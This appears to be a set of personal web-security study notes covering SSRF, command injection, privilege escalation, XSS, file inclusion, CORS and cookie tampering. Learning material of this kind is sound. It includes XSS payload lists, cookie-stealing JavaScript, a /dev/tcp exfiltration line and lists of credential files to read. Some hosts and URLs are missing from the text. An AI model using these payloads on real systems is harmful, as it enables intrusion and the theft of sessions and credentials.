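The classic payload shapes above can be triaged with a quick check like this (a sketch with hypothetical names; real filters are often blacklists like this one, which is exactly why they get bypassed with alternate encodings and redirects):

```python
from urllib.parse import urlparse

BLOCKED_SCHEMES = {"file", "telnet", "gopher", "dict"}
INTERNAL_HOSTS = {"localhost", "", "::1"}

def looks_like_ssrf_probe(url):
    # Non-HTTP schemes and loopback/internal hosts in a user-supplied
    # "url=" parameter are the classic SSRF payload shapes.
    p = urlparse(url)
    return p.scheme in BLOCKED_SCHEMES or (p.hostname or "") in INTERNAL_HOSTS
```

When hunting, the attacker's job is the inverse: find a form of the internal address that such a check does not recognize.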

A vuln involving a POST request might be more powerful than one involving a GET request, since POST usually is used to write data.
Attacker --req with malicious params--> Web/App Server --malicious req--> File Server

Detectify's "What is server side request forgery (SSRF)?"
EdOverflow / bugbounty-cheatsheet /
Wallarm / SSRF bible
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-2"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-3"
Shorebreak Security's "SSRF's up! Real World Server-Side Request Forgery (SSRF)"

Command Injection

When there is some way for pages to cause the Web/App Server to execute OS commands on its OS, there may be a fault that allows unexpected commands to be run. Any place where a parameter from the user is being used in an OS command gives the chance to terminate that command and add a second command, or add a second argument to the original command.

In PHP, the command primitive is exec(). In ASP, it is typically the WScript.Shell object's Exec() or Run(). In Perl, any command between a set of back-ticks (`) is executed.

If a parameter is being passed into a command string, try pipe symbol (|) or double-pipe (||) or ampersand (&) or semi-colon (; or %3b), followed by a command you want to run.
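The difference between a vulnerable and a safer command construction can be shown in a few lines (Python, hypothetical function names; "nslookup" stands in for whatever command the app runs):

```python
import shlex

def build_vulnerable(host):
    # UNSAFE: this string is destined for os.system()/a shell,
    # so ";" in the parameter starts a second command.
    return "nslookup " + host

def build_safer(host):
    # Quoting (or better, an argv list with shell=False) keeps
    # ; | & and friends literal.
    return "nslookup " + shlex.quote(host)

payload = "; cat /etc/passwd"
```

With the vulnerable version, the payload yields `nslookup ; cat /etc/passwd`: an empty nslookup plus your command.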

If you can't see the results of a command, try injecting a time-delay. Such as command "ping -c 2 -i 30 -n" to delay 30 seconds. Or use a command to create a file which you then can browse to, such as "ls > /var/www/html/foo.txt" or "dir > c:\inetpub\wwwroot\foo.txt" (you have to figure out the OS type and mapping from web root to OS directory). Or use a network command such as TFTP or netcat to contact attacker's server. Even "cat" can be used for this, as in "cat /etc/passwd >/dev/tcp/" ?
Attacker --req to run "cat /etc/passwd"--> Web/App Server
Attacker <--contents of /etc/passwd-- Web/App Server

DRD_'s "Use Command Injection to Pop a Reverse Shell on a Web Server"
Raj Chandel's "Comprehensive Guide on OS Command Injection"
Carrie Roberts' "OS Command Injection; The Pain, The Gain"
OWASP's "Testing for Command Injection (OTG-INPVAL-013)"
EdOverflow / bugbounty-cheatsheet / RCE

Gaurav Kamathe's "9 things to do in your first 10 minutes on a Linux server"

If you can convince the user to copy/paste something harmless-looking from your web page onto their local shell/commandline, you can get them to run a command/script you choose: Brian Tracy's "Don't Copy Paste Into A Shell" and example.

Privilege Escalation

If you can get access to the OS level of a server, either via Command Injection from a page, or via Shell Access, maybe you can escalate access from normal user to more powerful user.

On Linux, some standard privilege-escalation paths are: su, sudo, sudoedit, visudo, pkexec, admin:// URI scheme (as in "xed admin:///etc/passwd"), "s" bit in file permissions, cron jobs, putting system in single-user mode (run level 1). Some non-standard or distro-specific or non-Linux commands: calife, op, super, kdesu, kdesudo, ktsuss, beesu, gksu, gksudo, pfexec, in GUI file-explorer or desktop right-click and select "Open as root". For editing specific files: vipw, vigr.
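Checking for the "s" bit programmatically is straightforward (hypothetical helper name; the shell equivalent is `find / -perm -4000 -type f 2>/dev/null`):

```python
import os
import stat

def is_setuid(path):
    # Files with the setuid "s" bit run with the file owner's privileges;
    # root-owned setuid binaries are the classic escalation targets.
    return bool(os.stat(path).st_mode & stat.S_ISUID)
```

Any setuid binary that is writable, misconfigured, or has known exploits (see GTFOBins-style lists) is a candidate path to root.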

Arnav Tripathy's "Linux Privilege Escalation Basics"
SK's "How To Check If A Linux System Is Physical Or Virtual Machine"
Linux Privilege Escalation articles in Hacking Articles' "Penetration Testing"
TokyoNeon's "How to Perform Privilege Escalation, Part 1 (File Permissions Abuse)"
TokyoNeon's "How to Perform Privilege Escalation, Part 2 (Password Phishing)"
DRD_'s "Perform Local Privilege Escalation Using a Linux Kernel Exploit"
Barrow's "Use a Misconfigured SUID Bit to Escalate Privileges & Get Root"
OccupyTheWeb's "Finding Potential SUID/SGID Vulnerabilities on Linux & Unix Systems"
Bill Tsapalos's "Hack Metasploitable 2 Including Privilege Escalation"
Rashid Feroze's "A guide to Linux Privilege Escalation"
g0tmi1k's "Basic Linux Privilege Escalation"
itsKindred / jalesc (Bash script for locally enumerating a compromised Linux box)
Aidan Preston's "Linux Notes / Cheatsheet"
Once you have root privilege: int0x33's "Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win"

Remote Code Execution (RCE)

The ultimate achievement, especially if it's with root privilege. A request across the internet causes execution of an OS command or other code on the target. The code could create, update or delete files, exfiltrate files or information, open a remote shell, attack other machines on the LAN, etc.

Really this is a form of Command Injection, coming from outside.

Combined / Other

Cross-Site Scripting (XSS)

A confusing mega-term that has grown over the years, and often in ways that don't match the name at all. Some forms of it are not "cross-site", and some forms don't involve scripting. And it mixes two steps: input and exploitation.

XSS basically is the ability to run your own JavaScript on someone else's page.

XSS is targeting an individual user, usually putting a malicious page or script in their browser.

From Portswigger's "Web Security Academy":
[XSS] is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data.

From Hacktrophy's "Description of basic vulnerabilities":
XSS attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any unprotected cookies, session tokens, or other sensitive information retained by your browser and used with that site.

Some forms of XSS:
  • Reflected (AKA rXSS or first-order XSS).

    Input to server is "reflected" back in the output from the server. It is non-persistent.

    ZAP has a module to look for this automatically. It will generate a request giving some unique value for a parameter, then look to see if that value is in the response page. And do this for all parameters and fields in all URLs and pages, I think. It analyzes how the value appears in the response, determining if it's in a tag attribute, tag text, free text, quoted, etc.
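The core of that reflection check is tiny (a sketch with hypothetical names; ZAP's real implementation also classifies the context the value lands in):

```python
import secrets

def make_probe():
    # A unique, unlikely-to-occur marker, one per parameter under test.
    return "zq" + secrets.token_hex(4) + "qz"

def is_reflected(probe, response_body):
    # If the marker comes back verbatim, this parameter reaches the page;
    # the next step is checking its context (attribute, tag text, script).
    return probe in response_body
```

Using a fresh random marker per parameter avoids false positives from caching or from other parameters being reflected.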

    Attacker --sends malicious link--> User    
        User --request from malicious link--> Web/App Server
        User <--page with malicious script-- Web/App Server

    Somehow attacker gets user to click a link to Web/App Server, but parameters make server return a page that does something malicious, maybe redirect user to some other site, or use user's creds to do web-app operations, or copy a session token or cookie and send it to attacker.


  • DOM-based.

    Malicious code is put in user's DOM, and interacts with a normal web-app page, maybe one that has already been fetched from the server. This is non-persistent.

    From Portswigger's "Web Security Academy":
    DOM-based XSS arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

    Attacker --sends malicious link--> User    
        User --normal page request--> Web/App Server
        User <--normal page-- Web/App Server

    Somehow attacker gets user to click a link that interacts with the existing web page to store something in the browser's DOM (for example, storing an URL parameter into the src attribute of an img tag). Then after the NEXT page is fetched from the web-app server, the code or user input does something malicious, maybe redirect user to some other site, or use user's creds to do web-app operations, or copy a session token or cookie and send it to attacker. This is XSS because the code came from some other domain, but now is executing in the web-app's domain. It can happen just about anywhere that user input is put straight into the current page (DOM), without sending it to the server.

    From Excess XSS:
    In reflected or stored XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.

    In DOM-based XSS, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page's legitimate JavaScript treating user input in an unsafe way.

    If the code redirects the user to some other site, this is a form of "Open Redirect", where application's page normally redirects to an URL, and somehow you can change this so it goes to URL of Attacker's Server. User may not notice that they're no longer in a trusted app.

    Brute's "DOM-based XSS - The 3 Sinks"

    [There is another form of DOM-based XSS which is "stored" ? Code comes from database, modifies the DOM, then something bad happens ?]

    Another form of DOM-based XSS: attacker uses a proxy to modify the response from the server, and the client code in the DOM reacts by doing something it shouldn't. For example, change "payment succeeded" flag in response from false to true, and see what the client code does. That code is running in application's domain, so it's not the same as the attacker trying to modify the DOM directly. Or the code might be complex or obfuscated, and this is an easy way to turn on hidden features. Change a mode flag in the response from "user" to "admin". Change a debug flag from false to true.
    Jon Bottarini article

  • Stored (AKA sXSS, or second-order XSS, or source-based XSS, or persistent XSS).

    Attacker's code is stored in server and served to other users in pages. This is persistent. Common in applications where users can communicate with each other, or admins review user-generated content.

    Attacker --sends malicious data--> Web/App Server --stores malicious data--> Database Server
    Later ...
    User --normal page request--> Web/App Server --request for data--> Database Server
    User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server

    Code stored by one user is served to another user, without being sanitized properly. Page does application operations using user's creds, or other malicious things.

    [There's really no "cross-site" in this.]

    Stored XSS is considered the most serious because:
    • There's no need to make a user click a link (they just use the application).
    • The user is guaranteed to be logged in to the application when they get the code.
    • Many users can be compromised with just one piece of stored code.
    • Even privileged users (who may be more wary of clicking a link) can be compromised.
    • More likely to work with any browser, unlike DOM-based XSS.

  • Self-XSS.

    Could be any one of the three previous types (reflected, DOM-based, stored), but only affects the current user (attacker).

    Maybe this could be used to bypass client-side validation, and probe the server from within a same-origin page. Disable rate-limiting and try passwords, or log in/out repeatedly and see if there's a pattern to session token values.

    hacker_snail's "My first attempt at XSS"

  • Mutation XSS.

    Give page code that is "illegal" in a way that confuses the parsing and scripting engines in the browser. In some cases, you can get a parser to change code from HTML to script.

    LiveOverflow's "XSS on Google Search - Sanitizing HTML in The Client?" (video)

Not sure where this fits:
If an app's page has anchor tags that include 'target="_blank"', it may be vulnerable: Alex / JitBit article.

So each of these involves a first step to get bad data in (bad parameters, SQLi, Script Injection, Template Injection, etc) and then a second step to do exploitation (Request Forgery or redirection or other).

[For reflected and DOM-based XSS:]
From Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
... you may be forgiven for wondering why, if the attacker can induce the user to visit a URL of his choosing, he bothers with the rigamarole of transmitting his malicious JavaScript via the XSS bug in the vulnerable application. Why doesn't he simply host a malicious script on and feed the user a direct link to this script? Wouldn't this script execute in the same way as it does in the example described?

To understand why the attacker needs to exploit the XSS vulnerability, recall the same-origin policy that was described in Chapter 3. Browsers segregate content that is received from different origins (domains) in an attempt to prevent different domains from interfering with each other within a user's browser. The attacker's objective is not simply to execute an arbitrary script but to capture the user's session token. Browsers do not let just any old script access a domain's cookies; otherwise, session hijacking would be easy. Rather, cookies can be accessed only by the domain that issued them. They are submitted in HTTP requests back to the issuing domain only, and they can be accessed via JavaScript contained within or loaded by a page returned by that domain only. Hence, if a script residing on queries document.cookie, it will not obtain the cookies issued by, and the hijacking attack will fail.

The reason why the attack that exploits the XSS vulnerability is successful is that, as far as the user's browser is concerned, the attacker's malicious JavaScript was sent to it by ... This is why the attacker's script, although it actually originates elsewhere, can gain access to the cookies issued by This is also why the vulnerability itself has become known as cross-site scripting.

Another factor is that the link or page-URL the user sees is that of the (trusted) Web/App Server. The link may come to the user via email or by seeing it on Attacker's Server somehow, or from a page or message in the application, but user trusts it because it points to the real application.

From "Penetration Testing" by Georgia Weidman:
"Cross-site scripting exploits the trust a user has in a website".

Possible payloads/effects of exploiting XSS:
  • Defacing the app (presenting bad pages to users), embarrassing the company or costing it money.

  • CSRF: do operations using the user's session token and permissions.

  • Phishing: convince users to type login credentials or other sensitive info, for the app or for other sites, into a web-app page that sends the info to the attacker.

  • Cookie-stealing: get script to execute:
    document.location = ''+encodeURIComponent(document.cookie);
    or create a new DOM element whose request carries the cookie out:
      var e=document.createElement('img');
      e.src=''+encodeURIComponent(document.cookie);
      document.body.appendChild(e);
  • Steal auto-completed data from form fields in web-app page.

  • Exploit the browser to grab browsing history, or do OS commands that result in keylogging or other actions.

  • A malicious attacker could have the web-app page load ads that provide revenue to the attacker, or do "likes" of attacker's page on Facebook.

  • Use the web-app page to send messages or emails to other users.

Luke Stephens' "How to Upgrade Your XSS Bugs from Medium to Critical"

How to approach a web page to look for XSS, from Hacker101 - XSS and Authorization (video):
  • Give input and trace where it comes back out. In a tag attribute, or text of a tag, or a string in a script ?

  • Look for any special cases, such as URLs turned into Anchor tags.

  • Figure out how special characters are handled. Maybe give one string of
    and see what comes out. The handling of special characters should vary by context: in an URL, in an attribute, in a tag's text, in a script.
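As a baseline for "how should special characters be handled", the stdlib shows correct entity-encoding; any of these characters coming back raw suggests an injection point (a minimal illustration):

```python
from html import escape

probe = '\'"<>&'

# Properly encoded for an attribute-value context (quotes included):
encoded = escape(probe)
# Tag-text context often only needs < > & encoded:
partial = escape(probe, quote=False)
```

Script-string and URL contexts need different encodings again (backslash/JS escaping, percent-encoding), which is why one probe string rarely covers every context.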

Excess XSS
Wikipedia's "Cross-site scripting"
OWASP's "Cross-site Scripting (XSS)"
Jean Fleury's "A Not-So-Brief Overview of Cross-Site Scripting"
Jean Fleury's "ClickJacking vs Cross Site Request Forgery"
Kurt Muhl's "Cross-site scripting: How to go beyond the alert"
zseano's "Cross Site Scripting (XSS) - The famous alert"
XSS articles in Hacking Articles' "Web Penetration Testing"
DRD_'s "Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 1"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 2"
EvilToddler's "Find XSS Vulnerable Sites with the Big List of Naughty Strings"
Joe Smith's "Cross Site Scripting (XSS) Basics"
Alex Long's "Use JavaScript Injections to Locally Manipulate the Websites You Visit"
Alex Long's "How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)"
CrackerHacker's "Exploiting XSS with BEEF (Part 1)"
DomGoat's "Client XSS Introduction"
Bugcrowd University - Cross Site Scripting (XSS) (video) (stale)
reddit's /r/xss might have some bugs posted but the bounty not claimed
Brute's "XSS 101"
Brute's "The 7 Main XSS Cases Everyone Should Know"
Brute's "Probing to Find XSS"
Brute's "File Upload XSS"
Brute's "Using XSS to Control a Browser"
Holly Graceful's "ClickJacking and JavaScript KeyLogging in Iframes"
See Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.
Security Idiots' "Posts Related to Web-Pentest-XSS"

Sites that often are vulnerable: sites that allow users to edit themes, or add CSS, or set event/meeting name, or show your Facebook page in a frame, or specify filename for uploading, or set a custom Error page.
"Multi-context polyglot payload": String that tries to work in many different contexts, so you don't spend a lot of times trying many approaches.

Tools, mostly:
XSS.Cx (a Crawler and Injection Reporting Tool)
int0x33 / 420 (Automated XSS Vulnerability Finder)
XSS Chef (generate HTML and script payloads to order)

Payloads, mostly:
Code to put (one at a time) into URL parameters and form fields, and see if they execute or come back in the page source:

<iframe src=javascript:alert(1)>
alert '1'
alert (/1/)
" autofocus onfocus=alert(1) x="
<marquee onstart=alert(1)>test</marquee>
"><script >alert(document.cookie)</script >
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
# fake URL param "foo":
EdOverflow / bugbounty-cheatsheet /
RSnake's "XSS cheatsheet"
OWASP's "XSS Filter Evasion Cheat Sheet"
Gareth Heyes' "One XSS cheatsheet to rule them all"
PortSwigger's "XSS cheat sheet"
int0x33's "XSS Payloads, getting past alert(1)"
Zgheb's "XSS Tricks"
XSS Payloads
XSS Polyglot Challenge v2
Jack Masa's XSS Mindmap
Pgaijin66 / XSS-Payloads
RenwaX23 / XSS Without parentheses ()
0xSobky / HackVault / Unleashing an Ultimate XSS Polyglot
JS-Alpha (convert JS code to contain only /[a-z.()]/ characters)

Paraphrased from Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto:
You can introduce script code into an HTML page in four broad ways:
  • Script Tags: either standalone or wrapped inside a tag.
    <object data="data:text/html,<script>alert(1)</script>">
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
    <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>
    <script>onerror=alert;throw 1</script>
    <script>{onerror=alert}throw 1</script>
    <script>throw onerror=alert,'some string',123,'haha'</script>
    <script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
    <script> ='=/',0[onerror=eval]['/-alert(1)//']</script>

  • Event Handlers:
    <style onreadystatechange=alert(1)>
    <object onerror=alert(1)>
    <img src=1 onerror=alert(1)>
    <video src=1 onerror=alert(1)>
    <audio src=1 onerror=alert(1)>
    <x src=1 onerror=alert(1)>Click here</x>
    <img/anyjunk/onerror=alert(1) src=1>
    <img onerror="alert(1)"src=1>
    <img onerror="alert '1'"src=1>
    <img onerror="alert (/1/)"src=1>
    <img src=1 onerror=alert;throw 1;>
    <img src=1 onerror=eval;throw'=alert\x281\x29';>
    <img src=`1`onerror=alert(1)>
    <img src=1 onerror=a&#x06c;ert(1)>
    <img src=1 onerror=a&#x006c;ert(1)>
    <img src=1 onerror=a&#108;ert(1)>
    <object onerror=debugger;>
    window.setTimeout(function(){ alert(1); }, 3000)

  • Script Pseudo-Protocols:
    <object data=javascript:alert(1)>
    <embed src=javascript:alert(1)>
    <form id=test /><button form=test formaction=javascript:alert(1)>
    <event-source src=javascript:alert(1)>
    <a href="javascript:alert(document.domain)">sometext</a>

  • Dynamically Evaluated Styles:
    <x style=x:expression(alert(1))>
    <x style=behavior:url(#default#time2) onbegin=alert(1)>

Also, change the base path used for relative URLs:

<base href="">
<script src="goodscript.js"></script>

Sean Wright's "Cross-Site Scripting (XSS) Exploitation"

Cross-Site Leaking (XS-Leak, XS-Search)

A new and growing set of techniques, where code from one site finds out information about activity from another site. For example, clear browser cache, have user load a page, see if a certain image appears in the cache.

James Walker's "New XS-Leak techniques reveal fresh ways to expose user information"

File Inclusion (LFI, RFI)

This could cause "file execution" or "file viewing".

For execution: Some languages let the server-side scripting do an "include" of a file's contents into the executable of the script. Trick the code into using your file, or rewrite the contents of the file it already uses.

For viewing: Where the code expects the path of some user-uploaded file (such as a CV/resume, or a message attachment), give it the path of some app or system file (such as /etc/passwd).
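The viewing case is usually a path-traversal problem; the usual (and often botched) fix looks like this sketch (hypothetical names, POSIX paths assumed):

```python
import os.path

UPLOAD_ROOT = "/var/www/uploads"   # hypothetical upload directory

def resolve_upload(name):
    # "../../etc/passwd" survives a naive join; normalize the result and
    # re-check that it is still inside the upload root.
    path = os.path.normpath(os.path.join(UPLOAD_ROOT, name))
    if not path.startswith(UPLOAD_ROOT + os.sep):
        raise ValueError("traversal attempt: " + name)
    return path
```

When the check is weaker than this (say, a substring blacklist for "../"), encodings like "..%2f" or "....//" often slip through.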

Good files to get on Linux: /etc/passwd, /etc/shadow, /proc/version, /proc/self/version, /proc/sched_debug, /proc/mounts, id_rsa.
Aidan Preston's "Linux Notes / Cheatsheet"

There are several different ways to accomplish this:
  • If URL parameters are used to specify the filename, give an URL to your site.
  • If URL parameters are used to select the file, give bad URL parameters.
  • If the filename comes from the database, do SQLi to change the filename.
  • If a template engine is involved, do template injection.
  • If you have achieved OS access to the Web/App Server, rewrite the file.
  • If there is non-HTTP access to the server (FTP, SCP, WebDAV, etc), use that to rewrite the file.
  • If there is a File Upload vuln in the app, use that to rewrite the file.

If you can change the filename used, you can change it to name of a:
  • Local File (LFI).
    Attacker --req for page X--> Web/App Server
    Attacker <--results of executing code from local file F-- Web/App Server
  • Remote File (RFI).
    Attacker --req for page X--> Web/App Server --req for file F--> Attacker's Server
    Attacker <--results of executing code from remote file F-- Web/App Server <--contents of file F-- Attacker's Server

URL parameters likely to do a file inclusion:
  • file=
  • folder=
  • path=
  • style=
  • template=
  • php_path=
  • doc=
  • document=
  • root=
  • pg=
  • pdf=

Wikipedia's "File inclusion vulnerability"
EdOverflow / bugbounty-cheatsheet / LFI
Asfiya Shaikh's "File Path Traversal and File Inclusions"
Jean Fleury's "Finally, My First Bug Bounty Write Up (LFI)"
George Mauer's "The Absurdly Underestimated Dangers of CSV Injection"
LFI/RFI articles in Hacking Articles' "Web Penetration Testing"
OWASP's "Testing for Local File Inclusion"
OWASP's "Testing for Remote File Inclusion"
WASC's "Remote File Inclusion"
Kevin Burns' "Directory Traversal, File Inclusion, and The Proc File System"
Aptive's "Local File Inclusion (LFI) Web Application Penetration Testing"
Arr0way's "LFI Cheat Sheet"

From Bbinfosec's "Collection Of Bug Bounty Tip - Will Be updated daily":
"If you find a LFI, ignore /etc/passwd and go for /var/run/secrets/ This will raise the severity when you hand them a Kubernetes token or cert." [Also look for ~/.aws/credentials]

Insecure CORS (Cross Origin Resource Sharing)

Browsers enforce "same-origin policy", which means a resource can be accessed from a page only if protocols (HTTP, HTTPS) match, port numbers (80, 443, etc) match, and domains match exactly. But developers can weaken this by using messaging (postMessage), or by changing document.domain in the DOM, or by using CORS (XMLHttpRequests to domains outside your origin, using special headers).
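The origin comparison itself is simple (a sketch with a hypothetical helper; this version does no default-port normalization, so "https://a.example" and "https://a.example:443" compare unequal):

```python
from urllib.parse import urlsplit

def same_origin(a, b):
    # Same-origin policy: scheme, host, and port must all match exactly.
    pa, pb = urlsplit(a), urlsplit(b)
    return (pa.scheme, pa.hostname, pa.port) == (pb.scheme, pb.hostname, pb.port)
```

Every CORS misconfiguration is, in effect, a developer punching a hole in this comparison.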

"As far as I am aware, nothing aside from a browser even gives the CORS headers a second glance. They don't do anything in and of themselves; they are purely instructions to a browser to say 'here is how these sites can interact'."

wikipedia's "Cross-origin resource sharing"
James Kettle's "Exploiting CORS misconfigurations for Bitcoins and bounties"
Geekboy's "Exploiting Misconfigured CORS (Cross Origin Resource Sharing)"
Suyog Palav's "Exploitation of Mis-configured Cross-Origin Resource Sharing (CORS)"
Muhammad Khizer Javed's "Exploiting Insecure Cross Origin Resource Sharing (CORS)"
Brute's "Cross-Origin Scripting"

Cookie Tampering

Edit application's cookie on the client side, to see what happens if you delete or add or modify components/parameters. Use Firefox's development tools, or use Burp to catch the response headers and modify the cookie there. You need to catch the setting of the cookie, the first time that is done.

Try changing the order of parameters in the cookie, or adding duplicate parameters, to see what happens. Set illegal values, or additional parameters with new names. If you get errors back from the web/app server, that could give you useful info.

An app should be setting the HttpOnly and Secure flags on the cookie. If HttpOnly isn't set, client-side JavaScript can read and modify the cookie. If Secure isn't set, the cookie will be sent over HTTP as well as HTTPS.

If you see any encoded data in the cookie, definitely try to decode it; it could be something important. If it ends in "=" or contains "/", it's probably Base64-encoded. If it's all hex digits, usually all-uppercase or all-lowercase, it's probably hex-encoded; 32 or 40 hex digits (nybbles) is probably an MD5 or SHA-1 hash.
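Those heuristics can be automated in a few lines (a sketch with a hypothetical helper name; real cookies often nest several encodings):

```python
import base64
import binascii

def guess_cookie_encoding(value):
    # All-hex suggests hex encoding (32 or 40 digits: likely an MD5 or
    # SHA-1 hash); otherwise try strict Base64 decoding.
    try:
        int(value, 16)
        return "hash" if len(value) in (32, 40) else "hex"
    except ValueError:
        pass
    try:
        base64.b64decode(value, validate=True)
        return "base64"
    except (binascii.Error, ValueError):
        return "unknown"
```

A value classified as "hash" is worth feeding to a cracking tool; a "base64" value should be decoded and the result inspected (and possibly decoded again).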

It's not a vuln if you can copy a cookie between two sessions that you started for different users, so that user2 suddenly has the permissions of user1; you control both browsers in that test. It is a vuln if you can get that to happen without having access to both machines/browsers.

Hacker101 - Cookie Tampering Techniques (video)

Macro Mosaic's "Hack SAML Single Sign-on with Burp Suite"

Barrow's "Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed"

CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 1"
CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 2"

Ceos3c's "Obtaining Domain Credentials through a Printer with Netcat"
Printer Exploitation Toolkit

Weird forms of IP address (overflows, different bases, http://127.1 instead of, http://1.1.257 instead of, http://0xC0A80001 or http://3232235521 instead of, etc) or domain name, to get past a blacklist or filter. Called "URL obfuscation" ?
sii / sipcalc
David Anderson's "Fun with IP address parsing"
Chris Siebenmann's "My uncertainty over whether an URL format is actually legal"

Weird / unicode encodings in email addresses, URLs, JavaScript code, etc:
Christopher Bleckmann-Dreher's "How does 🙈 or 💩 affect our S�curity?" (slide show)

Cache poisoning: if there is a cache between clients and the server, set HTTP request headers such as X-Host, X-Forwarded-Host, X-Original-Url, or X-Rewrite-URL so that the cache stores and returns malicious data to other users. You need to know which headers and parameters are used in cache matching (which are in the cache key). Use the Param Miner extension for Burp.

Some ways of transferring a file to a target: FTP, SFTP, TFTP, SCP, WebDAV, shell (run netcat or ncat or something), file-share (NFS, Samba, etc), web app's Upload/Attachment features, object API (SOAP, REST) over HTTP.

Some ways of connecting to a target: HTTP, Telnet, RDP, SSH, VNC, TeamViewer.

For most attack types, you can type "TYPE payloads" or "TYPE exploits" into a search engine and get links to lots of useful cheat-sheets. For example, search for "XSS payloads".

EdOverflow / bugbounty-cheatsheet / CRLF Injection || HTTP Response Splitting

EdOverflow / bugbounty-cheatsheet / Open Redirect

Jayson Grace's "Web Application Penetration Testing Notes"
Jayson Grace's "Pentesting notes and snippets"
Arr0way's "Penetration Testing Tools Cheat Sheet"
k2haxor / HACK-THEM-ALL
Raj Chandel's "Hacking Articles"

swisskyrepo / PayloadsAllTheThings

amanvir's "Security Issues in Modern JavaScript"
It's JavaScript
Shankar R's "Bug Hunting Methodology(Part-3)" (tips and snippets)






Application-configuration attacks

Harsh Bothra's "10 Most Common Security Issues Found in Login Functionalities"

Application-logic or business-logic attacks

QA engineer walks into a bar
There is no magic cheatsheet for this kind of attack/exploit. You have to study the application and try to do unexpected things.

Some examples:
  • Give it dates in the future/past in inappropriate ways.
  • Give it negative order numbers or order quantities or payments.
  • If it's using encrypted tokens, copy a token from one area to another, or find two places where it's creating the tokens differently.
  • If there are multi-stage operations, try to skip a stage or many stages. In a later stage, try to modify data (price, username, amount paid, etc) set and validated in an earlier stage. See how the process changes for users with different privilege levels.
  • User1 sends message and then deletes account, user2 tries to reply to the message ?
  • Create account User1, store some data, delete account, then try to create new account of same name.
  • Violating some constraint that is not enforced (two users with same username or same email address ?).
  • Trigger errors everywhere you can, and see how they are handled and reported.
  • If some operations are particularly complicated, look at those.
  • Modify a password-reset request so it specifies your email address but another user's ID ? article1 article2
  • If the application can be tricked into doing something weird/alarming to many users (e.g. flood them with SMS messages), that may not be a security flaw per se, but it could cause damage to the company's reputation.
  • Sensitive-information disclosure: for example, if the application reveals something it shouldn't about another user, that may not be a security flaw per se, but it is wrong behavior.
See Chapter 11 "Attacking Application Logic" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Client-Side SQL Injection / Local Storage

HTML5 supports client-side SQL databases, which applications can use to store data on the client.

Maybe explore what is stored there for the attacker-as-normal-user, and see how the client-side code manipulates it. Look for places where URL parameters or user input get into the database. Then try to do a sort of "reflected SQL injection", where parameters given to user result in SQL that extracts data and sends it to attacker ?

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.

Flash, Silverlight, and Internet Explorer have their own local storage mechanisms.

HTML5 has local storage mechanisms.
tutorialspoint's "HTML5 - Web Storage"

Mobile Attacks

A mobile app may have all the same issues as a web app (because often the mobile app is talking to a web app or server somewhere), plus many more client-side issues. The app developer usually can't control what version of OS is on the client, what other apps are on it, whether it's rooted/jailbroken, etc.

Since you can get the binary, and maybe recover some source, of a mobile app, look inside it for keys, URLs, IP addresses, email addresses, comments, and credentials.
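That search can be a simple recursive grep. A minimal sketch, assuming you've already decompiled the app (e.g. with apktool or jadx) into a local directory; the regexes are rough heuristics, not exhaustive, so tune them per target:

```python
# Sketch: grep a decompiled mobile app for likely secrets.
import re
from pathlib import Path

PATTERNS = {
    "url":     re.compile(r"https?://[^\s\"'<>]+"),
    "email":   re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "ip":      re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "aws_key": re.compile(r"AKIA[0-9A-Z]{16}"),      # AWS access key ID shape
}

def scan_text(text):
    """Return {label: [matches]} for one file's contents."""
    hits = {}
    for label, pat in PATTERNS.items():
        found = pat.findall(text)
        if found:
            hits[label] = found
    return hits

def scan_tree(root):
    for path in Path(root).rglob("*"):
        if path.is_file():
            try:
                text = path.read_text(errors="ignore")
            except OSError:
                continue
            hits = scan_text(text)
            if hits:
                print(path, hits)

root = Path("decompiled/")   # e.g. output directory of apktool or jadx
if root.is_dir():
    scan_tree(root)
```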

Cristian R's "10 things you must do when Pentesting Android Applications"
Vickie Li's "An Android Hacking Primer"
Craig Hays' "Target their mobile apps"
Ben Sadeghipour's "Q&A With Android Hacker bagipro"

Mobexler's "Mobile Application Penetration Testing Checklist"
tanprathan / MobileApp-Pentest-Cheatsheet
Brute's "XSS in Mobile Devices"

See Mobile App Tools.

Thick App / Desktop App Attacks

From people on reddit:
